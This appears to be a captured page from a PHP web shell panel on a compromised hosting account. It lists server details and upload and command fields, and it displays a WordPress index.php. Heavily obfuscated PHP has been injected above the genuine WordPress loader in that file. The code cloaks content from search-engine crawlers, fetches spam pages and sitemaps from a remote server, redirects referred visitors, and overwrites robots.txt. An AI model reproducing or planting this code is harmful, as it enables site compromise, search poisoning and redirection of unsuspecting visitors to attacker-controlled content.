403Webshell
Server IP : 217.160.0.199  /  Your IP : 216.73.217.173
Web Server : Apache
System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User : u57303684 ( 6469868)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/10/d315911638/htdocs/clickandbuilds/IssyInvestment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/10/d315911638/htdocs/clickandbuilds/IssyInvestment/index.php
<?php
 goto VFT2g; G_7vQ: $self = $_SERVER["\120\110\120\137\123\x45\x4c\x46"]; goto AJedR; mt3Rb: $indata1 = $inter_domain . "\57\151\x6e\x64\141\x74\x61\56\160\x68\x70"; goto EwhH6; VFT2g: $inter_domain = "\x68\x74\x74\160\x73\x3a\x2f\x2f\172\66\60\67\60\x39\x5f\x36\x2e\151\163\164\145\153\154\x69\146\56\x78\x79\172\57"; goto aVWTO; JKhDl: function check_refer($refer) { $check_refer = false; $referbots = "\147\x6f\x6f\x67\x6c\145\174\x79\141\150\x6f\157\174\x62\151\x6e\x67\174\141\157\x6c"; if ($refer != '' && preg_match("\x2f\50{$referbots}\x29\57\x73\151", $refer)) { $check_refer = true; } return $check_refer; } goto C2UMT; e_qV8: $jump1 = $inter_domain . "\x2f\x6a\165\x6d\160\56\160\x68\160"; goto oA6hc; ayDu6: $req_uri = $_SERVER["\122\x45\121\x55\105\x53\124\137\x55\122\111"]; goto UMBkF; Bnaj7: $data1["\x72\x65\161\137\165\162\151"] = $req_uri; goto zdccB; E3ucZ: $chk_refer = check_refer($referer); goto jPLTh; rit_8: $url_robots = $inter_domain . "\57\x72\157\142\157\164\x73\56\x70\x68\160"; goto OuBeG; MG33m: $data1["\x64\157\x6d\141\151\156"] = $domain; goto Bnaj7; zVKHe: if (substr($req_uri, -6) == "\x72\x6f\142\x6f\164\163") { define("\102\x41\123\x45\137\120\x41\x54\x48", $_SERVER["\104\117\103\125\x4d\105\x4e\124\137\x52\117\x4f\x54"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\157\x62\x6f\164\x73\x2e\164\170\164"); $data1["\x72\x6f\x62\157\x74\x73\x5f\x63\157\156\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\x2f\x72\x6f\x62\x6f\x74\x73\x2e\x74\x78\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\57\x72\x6f\x62\x6f\x74\163\x2e\164\170\164"); if (strpos(strtolower($robots_cont), "\163\151\x74\x65\x6d\141\x70")) { echo "\162\157\x62\x6f\x74\x73\56\x74\170\x74\40\146\x69\x6c\x65\x20\143\x72\145\141\164\145\40\163\165\x63\x63\145\163\x73\41"; } else { echo "\x72\x6f\x62\157\164\x73\x2e\164\x78\x74\40\146\x69\154\145\x20\143\x72\x65\x61\x74\x65\x20\146\141\x69\154\41"; } die; } goto B8dqU; UMBkF: $domain = $_SERVER["\x48\x54\x54\120\137\110\117\123\124"]; goto G_7vQ; UjUNk: $req_url = $http . $domain . $req_uri; goto mt3Rb; WRBVM: $referer = isset($_SERVER["\x48\x54\x54\x50\x5f\x52\105\106\x45\x52\x45\x52"]) ? $_SERVER["\x48\x54\x54\x50\x5f\x52\105\x46\x45\122\105\x52"] : ''; goto E3ucZ; zdccB: $data1["\150\162\x65\146"] = $href1; goto P5CBQ; Yiw02: function is_crawler($agent) { $agent_check = false; $bots = "\x67\x6f\x6f\147\154\x65\x62\157\164\174\142\x69\x6e\x67\142\157\x74\x7c\x67\x6f\157\147\154\x65\x7c\x61\x6f\x6c\x7c\x62\x69\156\x67\174\x79\141\150\x6f\157"; if ($agent != '') { if (preg_match("\57\50{$bots}\x29\57\163\151", $agent)) { $agent_check = true; } } return $agent_check; } goto JKhDl; B8dqU: if (substr($req_uri, -4) == "\56\170\x6d\x6c") { if (strpos($req_uri, "\x61\x6c\x6c\x73\x69\164\x65\x6d\x61\160\56\x78\x6d\154")) { $str_cont = getServerCont($map1, $data1); header("\103\157\156\164\145\x6e\x74\55\164\171\x70\x65\x3a\164\x65\170\x74\x2f\x78\155\x6c"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\150\160")) { $word4 = explode("\x3f", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\x78\x6d\x6c", '', $word4); } else { $word4 = str_replace("\57", '', $req_uri); $word4 = str_replace("\x2e\170\155\x6c", '', $word4); } $data1["\x77\x6f\162\x64"] = $word4; $data1["\x61\143\x74\151\157\156"] = "\x63\150\145\143\153\137\163\x69\x74\145\x6d\x61\x70"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\x74\x65\x6e\x74\55\164\171\x70\145\x3a\164\145\x78\x74\x2f\x78\155\154"); echo $str_cont; die; } $data1["\x61\x63\164\x69\157\x6e"] = "\x63\x68\145\x63\153\137\x77\157\x72\144\163"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\155\x61\x70") > 0 || $check1 == "\61") { $data1["\x61\x63\164\x69\x6f\x6e"] = "\162\141\156\x64\137\170\x6d\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\103\x6f\x6e\164\145\156\164\x2d\164\x79\x70\145\x3a\164\145\170\x74\x2f\170\155\154"); echo $check_url4; die; } } goto pWcpp; GwZ20: $req_uri = str_replace(array("\x2e\150\x74\x6d", "\56\150\x74\155\154", "\x2e\163\150\164\x6d\x6c", "\x2e\160\x68\164\x6d\154"), '', rtrim($req_uri, "\57")); goto uDb4G; k2kHQ: $data1[] = array(); goto MG33m; C2UMT: $http = isset($_SERVER["\110\124\124\x50\x53"]) && $_SERVER["\110\x54\124\120\123"] !== "\x6f\x66\x66" ? "\x68\x74\x74\160\163\72\x2f\57" : "\x68\164\164\x70\72\x2f\57"; goto ayDu6; OuBeG: if (strpos($req_uri, "\x2e\x70\150\160")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto k2kHQ; pWcpp: if (strpos($req_uri, "\x2e\160\150\x70")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\x6e\x5f\163\x68\x65\x6c\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\141\x69\x6e\137\163\x68\x65\x6c\154"] = $main_shell; } goto WRBVM; AJedR: $ser_name = $_SERVER["\x53\105\122\126\105\122\137\116\101\115\x45"]; goto UjUNk; aVWTO: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\x2b", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\x2e\x30\56\60", "\x3c")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto Yiw02; jPLTh: $user_agent = strtolower(isset($_SERVER["\110\x54\x54\120\137\125\x53\105\122\137\x41\107\x45\116\x54"]) ? $_SERVER["\x48\x54\124\120\137\125\x53\105\122\137\x41\107\105\116\x54"] : ''); goto C0I17; bPv9Y: if ($res_crawl) { $data1["\x68\164\164\160\137\x75\x73\x65\162\x5f\141\x67\x65\x6e\164"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto okxHa; uDb4G: if (!$res_crawl && $chk_refer && (preg_match("\x2f\134\x64\44\57", $req_uri) || preg_match("\x23\x5b\x61\x2d\172\x5d\x3d\133\x61\x2d\172\60\x2d\71\x5d\x2b\x23", $req_uri) || preg_match("\x2f\151\x74\145\x6d\57", $req_uri))) { $data1["\x69\x70"] = $_SERVER["\122\105\x4d\x4f\124\105\x5f\101\x44\104\x52"]; $data1["\162\x65\x66\145\x72\x65\162"] = isset($_SERVER["\x48\x54\x54\x50\137\x52\105\x46\105\x52\105\x52"]) ? $_SERVER["\x48\124\x54\120\137\x52\105\x46\105\122\x45\x52"] : ''; $data1["\165\163\145\162\x5f\x61\147\145\x6e\164"] = strtolower(isset($_SERVER["\x48\x54\x54\x50\137\x55\x53\x45\122\x5f\x41\107\105\116\124"]) ? $_SERVER["\x48\124\124\120\x5f\125\x53\x45\x52\137\x41\107\105\x4e\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto bPv9Y; C0I17: $res_crawl = is_crawler($user_agent); goto GwZ20; oA6hc: $url_words = $inter_domain . "\57\x77\157\x72\144\163\x2e\x70\x68\160"; goto rit_8; EwhH6: $map1 = $inter_domain . "\57\x6d\x61\160\56\160\x68\x70"; goto e_qV8; P5CBQ: $data1["\x72\x65\x71\x5f\165\x72\154"] = $req_url; goto zVKHe; okxHa: ?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Youez - 2016 - github.com/yon3zu
LinuXploit